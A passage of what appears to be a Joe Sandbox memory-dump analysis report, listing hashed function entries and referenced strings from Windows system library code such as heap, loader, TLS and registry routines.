                                                  • API ID:
                                                  • String ID: $$.mui$.mun$SystemResources\
                                                  • API String ID: 0-3047833772
                                                  • Opcode ID: f444e9bb1f0fbbdd9b5df660a880b9d182d403eb87d5d9adaab291ff4d601e2f
                                                  • Instruction ID: 8303be20e0742b3627e0511ecc974e2d13b2188ae5af047a74e4058f85b82447
                                                  • Opcode Fuzzy Hash: f444e9bb1f0fbbdd9b5df660a880b9d182d403eb87d5d9adaab291ff4d601e2f
                                                  • Instruction Fuzzy Hash: 08623A76A003299FDF20CF55CC40BD9B7B8BB0A354F4641EAE509A7A50DB719E84CF92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  • Opcode ID: 680e0e0c8c9a9baee2dbcf850d29baa58efde2f200cb0dabb2edd11feb3fde0e
                                                  • Instruction ID: fb5641c80cf796cc649bab8de5e5682651258da479063cc7c6d5dd571e5fa5a6
                                                  • Opcode Fuzzy Hash: 680e0e0c8c9a9baee2dbcf850d29baa58efde2f200cb0dabb2edd11feb3fde0e
                                                  • Instruction Fuzzy Hash: 6A613476A08780AFE312DB25DC44F6777E8EF84754F140468F9948B2A1DB74DC05CBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 0-336120773
                                                  • Opcode ID: 7e566343f9125691143fb47a95a281b365b5859b9d94fd3da5a2e677152288e0
                                                  • Instruction ID: 0ef2e612229ad53b7361152d4bc23b8c9b489b2d2584da17ba6ba22949b4b6b1
                                                  • Opcode Fuzzy Hash: 7e566343f9125691143fb47a95a281b365b5859b9d94fd3da5a2e677152288e0
                                                  • Instruction Fuzzy Hash: DB31DC79500210FFE711DBEACC80F96BBE8EF06A68F504055E500DF290EA31EC48EEA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 0-1391187441
                                                  • Opcode ID: c4d57b5bf7285b1e435a4337da8419f52278db7564abd57f036e6bc9d978bb49
                                                  • Instruction ID: 475d30187b2cc639853eda685d5593fe1fc4f8b39cd3aff4c14216b211a0b81e
                                                  • Opcode Fuzzy Hash: c4d57b5bf7285b1e435a4337da8419f52278db7564abd57f036e6bc9d978bb49
                                                  • Instruction Fuzzy Hash: F1313476A10214FFDB02DB96CC84F9ABBF9EF45764F104091E811AB290DB70ED41CE61
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: d21b16ebfdad8c6014b740081d479555b7f9bbb6dd4d247be822b542928c4d29
                                                  • Instruction ID: 3913e574e8eeda8a161a110d4c078987552961e4820c6957b511d6fe21b255c7
                                                  • Opcode Fuzzy Hash: d21b16ebfdad8c6014b740081d479555b7f9bbb6dd4d247be822b542928c4d29
                                                  • Instruction Fuzzy Hash: B151FD35E10615EFFF05CB64CC58BADBBB5BF04359F214029E642A3A90EBB09905CBD1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 05760226a999f40e63246e804f8b3839ff1d788051ccfbad96c9955bc28aed74
                                                  • Instruction ID: fce5f46c37fa5b96a64a443eb0c78b4b9e8215dcc6ad5505377fb8ea7b64dfa7
                                                  • Opcode Fuzzy Hash: 05760226a999f40e63246e804f8b3839ff1d788051ccfbad96c9955bc28aed74
                                                  • Instruction Fuzzy Hash: C8518A75A00616AFEB06DF64CC80B9ABBB6FF48314F144065E915A7790CB30AD19CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: a851ed976bbbc40dc6c4ab304e540c2a43c1c6789afe768e809199ad53512216
                                                  • Instruction ID: 07eea8afcea6e239b33536421000407620842ca8b4afacd1ebc016a2222f4395
                                                  • Opcode Fuzzy Hash: a851ed976bbbc40dc6c4ab304e540c2a43c1c6789afe768e809199ad53512216
                                                  • Instruction Fuzzy Hash: 0122F3B4A00341EFEF01CF26C890B6ABBF5FF45708F548499E4868B285DB35D886CB61
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36D51728
                                                  • HEAP[%wZ]: , xrefs: 36D51712
                                                  • HEAP: , xrefs: 36D51596
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 32ce42f7cf4cc1ef1fbc289125ef016e71a3371fe75eb7528c85a6860947e4cd
                                                  • Instruction ID: 8e97df2930fa06b4c0cc47b7a1c7a1f31ea6040add04cd8859a64a199d9a53fd
                                                  • Opcode Fuzzy Hash: 32ce42f7cf4cc1ef1fbc289125ef016e71a3371fe75eb7528c85a6860947e4cd
                                                  • Instruction Fuzzy Hash: 18E1FE74A04351DFEB15CF28C890B7ABBF1AF48308F158999E6D68B681DB34E945CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1145731471
                                                  • Opcode ID: 362a0a26a13598563145b329abc47a397b1619d8b55e1cb9bc12afd0c4a2e1fc
                                                  • Instruction ID: c059e4a91d056dc954e65da5368cc00467d3854c70de5c95ce42d9c4b0deb920
                                                  • Opcode Fuzzy Hash: 362a0a26a13598563145b329abc47a397b1619d8b55e1cb9bc12afd0c4a2e1fc
                                                  • Instruction Fuzzy Hash: C5B10C79E047549FEF14CF6AC890B9DB7B2BF44344F224429E952EBA84D770E840CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: 2ed90b4b2520b23cd2dbe7b4fbeb5bab2f07706423ceede7bd30ea69f23abd6e
                                                  • Instruction ID: 46455f35d2b02403a60d1f37346d031477f7797cafba7ab1ca22cac75d76823b
                                                  • Opcode Fuzzy Hash: 2ed90b4b2520b23cd2dbe7b4fbeb5bab2f07706423ceede7bd30ea69f23abd6e
                                                  • Instruction Fuzzy Hash: 6FB1C1B1A05341AFE711EF65CC80F5BB7E8EF46754F520829FA50AB640D771E809CBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                  • API String ID: 0-318774311
                                                  • Opcode ID: 382c1f930473792edab796f77bf443617fbb09dcb5faa5562d80df100cb1c357
                                                  • Instruction ID: e00f96431b00e25f5d6ac18489ae47aa78327e0e08a5df737d5aee975aede7e9
                                                  • Opcode Fuzzy Hash: 382c1f930473792edab796f77bf443617fbb09dcb5faa5562d80df100cb1c357
                                                  • Instruction Fuzzy Hash: 70817EB5A08350AFE311DB15CC80B6AB7E8EF85794F421929F980DB790DB74D904CBA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                  • API String ID: 0-3870751728
                                                  • Opcode ID: 8dbd98fe0618dddce5edf34f0eb8c00c703d5bec0439c828cd1284b49157e259
                                                  • Instruction ID: 19d1ce00df3f0703e86dfeb8905dd603345cf0cc4d9f270386ca2120995aec35
                                                  • Opcode Fuzzy Hash: 8dbd98fe0618dddce5edf34f0eb8c00c703d5bec0439c828cd1284b49157e259
                                                  • Instruction Fuzzy Hash: 00916EB4E002159FEB54DF69C884B9DBBF1FF48304F2481AAD904AB351E7759841CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-373624363
                                                  • Opcode ID: 9334dbb0bc3f041c01d16ec60f4b0c1d33ad930012ef175b0714614f35bf48a8
                                                  • Instruction ID: c7f84225600c7d66c4501c11bac08821916dc1b544fc1cda3593a1f6425ca348
                                                  • Opcode Fuzzy Hash: 9334dbb0bc3f041c01d16ec60f4b0c1d33ad930012ef175b0714614f35bf48a8
                                                  • Instruction Fuzzy Hash: BB91EFB5E00319CFEF11CF55C860BAE77B0FF05368F224195E951ABA90D7B89A80CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$&$@
                                                  • API String ID: 0-1537733988
                                                  • Opcode ID: d1c1e085b699dbbd577bf9140ac2f569e0b8d041bfd1dd5e1dca1898e8978e92
                                                  • Instruction ID: 589d13a5e055d4be3b653784f1687c36bbf3aa4d0dc0129512a369426de13d62
                                                  • Opcode Fuzzy Hash: d1c1e085b699dbbd577bf9140ac2f569e0b8d041bfd1dd5e1dca1898e8978e92
                                                  • Instruction Fuzzy Hash: DB71B0749183059FE710CF29C988B0BBBE9BF85758F604A1DF4DA4B690D730D905CB92
                                                  Strings
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36E2B82A
                                                  • TargetNtPath, xrefs: 36E2B82F
                                                  • GlobalizationUserSettings, xrefs: 36E2B834
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: b47d20f549fab68ab9451b821e74e6e8de501fab2602cc61f65fc9f0df0ebe52
                                                  • Instruction ID: 92eca205b67a2942ff412044681fa15aac184baddb2b948eec9fb8e23a2aef6b
                                                  • Opcode Fuzzy Hash: b47d20f549fab68ab9451b821e74e6e8de501fab2602cc61f65fc9f0df0ebe52
                                                  • Instruction Fuzzy Hash: 80617172D01229AFDB21EF55DC88BD9B7B9AF14758F4101E5E509AB250CB34DE88CF90
                                                  Strings
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36DAE6C6
                                                  • HEAP[%wZ]: , xrefs: 36DAE6A6
                                                  • HEAP: , xrefs: 36DAE6B3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: 8b1d0d3556aba2c52bf527fb7cff1d83cee11aff0d369a25eb92e94a840e118a
                                                  • Instruction ID: c67e5e0bea125444f2c40198aa813b5a8074123b1f29956751a51b1c16b6a696
                                                  • Opcode Fuzzy Hash: 8b1d0d3556aba2c52bf527fb7cff1d83cee11aff0d369a25eb92e94a840e118a
                                                  • Instruction Fuzzy Hash: 7651F5B5A04744EFE312DBA5C994FA6BBF8EF45344F0444A4E6808F692DB34ED40DB61
                                                  Strings
                                                  • LdrpCompleteMapModule, xrefs: 36DBA590
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 36DBA59A
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 36DBA589
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: d8088aa21f69d19561a68139518a4ed9c35ef64523beeb411c38dfc1e68c5ee8
                                                  • Instruction ID: f1244b1bb825dfe1c41d9e0af89b054a670e895aa7d7b16d0d17320932c3d2d8
                                                  • Opcode Fuzzy Hash: d8088aa21f69d19561a68139518a4ed9c35ef64523beeb411c38dfc1e68c5ee8
                                                  • Instruction Fuzzy Hash: 625110B4A007419BEB11CF29CD40B1A7FF4EF00758F1C02A5E9919B6E5DB74EA00CB96
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: f1ea2f342a179f94e5466d5b18b783ceab98b846a578b38cec01b34f1db85f67
                                                  • Instruction ID: 64253f1226622fc8d01292b22dbaa2f250b5f29b654d7f3ad500444e7008c35a
                                                  • Opcode Fuzzy Hash: f1ea2f342a179f94e5466d5b18b783ceab98b846a578b38cec01b34f1db85f67
                                                  • Instruction Fuzzy Hash: 124126B4B043808FFF1ADB69C484B6977E29F05388F68416DE4858F646DEB4DC86CB91
                                                  Strings
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36DC1B39
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36DC1B4A
                                                  • LdrpAllocateTls, xrefs: 36DC1B40
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 55184ac3289450455c162438b7c0422dfd6e61540a923d90445b1d5e5dd7c26c
                                                  • Instruction ID: 407af60224febfa1644bfc2c9c3d04d01c43db0dd3423865698dc13e85369201
                                                  • Opcode Fuzzy Hash: 55184ac3289450455c162438b7c0422dfd6e61540a923d90445b1d5e5dd7c26c
                                                  • Instruction Fuzzy Hash: 344179B5E01619EFDB05CFA9CC40AAEBBF6FF48704F518119E505A7640DB35A805CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-964947082
                                                  • Opcode ID: 63cc6d3e1a5c9dac0e4956a38cc0631a8cc45ab5263e447063012ab137d39831
                                                  • Instruction ID: bdcc738e51f24c2335a02594d4c516252842268c61264e5663c182be3e16eccf
                                                  • Opcode Fuzzy Hash: 63cc6d3e1a5c9dac0e4956a38cc0631a8cc45ab5263e447063012ab137d39831
                                                  • Instruction Fuzzy Hash: 5641C5F5911354EFE711EF67CA80E6A3BB9EF04308F604069EA2197245CA30C85DCF51
                                                  Strings
                                                  • SXS: %s() passed the empty activation context data, xrefs: 36DC29FE
                                                  • RtlCreateActivationContext, xrefs: 36DC29F9
                                                  • Actx , xrefs: 36D833AC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                  • API String ID: 0-859632880
                                                  • Opcode ID: 710293105d64d9ab09dd695e62d2f639b891f6b68197c55e824dfeb51a9ab61a
                                                  • Instruction ID: d53b9cf821013593dbfaf940b058b475850d4e79323f27bf36cbf369beac3c2f
                                                  • Opcode Fuzzy Hash: 710293105d64d9ab09dd695e62d2f639b891f6b68197c55e824dfeb51a9ab61a
                                                  • Instruction Fuzzy Hash: D7312232640315AFEB16CFA9D884F9637A4EF88724F524469ED0CDF691CB32D855CBA0
                                                  Strings
                                                  • GlobalFlag, xrefs: 36DDB68F
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36DDB632
                                                  • @, xrefs: 36DDB670
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: a5fbbbcbeeeccd640e756dd54811e801caf8fe50373c359cb2308f053f0580b4
                                                  • Instruction ID: 6895fd23f7b1c01d2285b09e5d26e14571d42bf9f823b64b39f02ca8e79754c6
                                                  • Opcode Fuzzy Hash: a5fbbbcbeeeccd640e756dd54811e801caf8fe50373c359cb2308f053f0580b4
                                                  • Instruction Fuzzy Hash: 83314CB5D00219AFDB00EF95DC80AEEBBB8EF44748F500469E605AB150DB749E04CBA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                  • API String ID: 0-1050206962
                                                  • Opcode ID: effba3c962f97a75b64f4dc25a0923af40bc9be3efb315836a9fb3632abdd220
                                                  • Instruction ID: c0ad77781165e26a958d3f712c829f0db16a3366fdcd785c574dca15bb748f08
                                                  • Opcode Fuzzy Hash: effba3c962f97a75b64f4dc25a0923af40bc9be3efb315836a9fb3632abdd220
                                                  • Instruction Fuzzy Hash: 9A317A72D10619BFEB01CF95CC80EEEBBBDEB48658F420465EA04BB210D7399D048BA1
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 36DC1A40
